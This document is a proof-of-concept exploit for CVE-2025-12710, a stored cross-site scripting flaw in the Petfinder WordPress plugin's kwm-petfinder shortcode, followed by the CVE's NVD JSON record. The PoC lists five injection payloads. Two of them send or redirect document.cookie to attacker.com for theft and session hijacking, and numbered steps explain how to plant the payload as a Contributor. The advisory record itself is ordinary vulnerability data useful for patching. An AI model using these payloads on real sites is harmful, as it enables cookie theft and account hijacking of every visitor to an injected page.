CVE-2025-12710

<!-- CVE-2025-12710 PoC: Stored XSS via kwm-petfinder shortcode --> <!-- Authentication required: Contributor-level access or higher --> <!-- This PoC demonstrates the XSS vulnerability in Petfinder plugin --> <!-- Method 1: Using script tag --> [kwm-petfinder id="1"><script>alert(document.cookie)</script><xss=""] <!-- Method 2: Using event handler (onerror) --> [kwm-petfinder name='test"><img src=x onerror=alert("XSS")>'] <!-- Method 3: Using onload event --> [kwm-petfinder category='"><body onload=alert(String.fromCharCode(88,83,83))>'] <!-- Method 4: Stealing cookies --> [kwm-petfinder pet_id='1"><script>fetch("https://attacker.com/steal?c="+btoa(document.cookie))</script>'] <!-- Method 5: Session hijacking payload --> [kwm-petfinder search='"><script>document.location="https://attacker.com/phishing?"+document.cookie</script>'] <!-- Note: The injected script will execute when any user views the affected page --> <!-- Payload persists in database until manually removed --> <!-- To test in WordPress: --> <!-- 1. Login as Contributor or higher --> <!-- 2. Create/edit a post or page --> <!-- 3. Insert one of the above shortcodes --> <!-- 4. Save and view the page --> <!-- 5. XSS alert will trigger on page load -->

{"cve": {"id": "CVE-2025-12710", "sourceIdentifier": "[email protected]", "published": "2025-11-19T06:15:46.257", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Pet-Manager – Petfinder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the kwm-petfinder shortcode in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L133", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L163", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/tier-management-petfinder/tags/3.6.1/kwm-petfinder.php#L164", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396792%40tier-management-petfinder&new=3396792%40tier-management-petfinder&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/35b0d959-2adb-4de4-b51b-1bfead49bc7d?source=cve", "source": "[email protected]"}]}}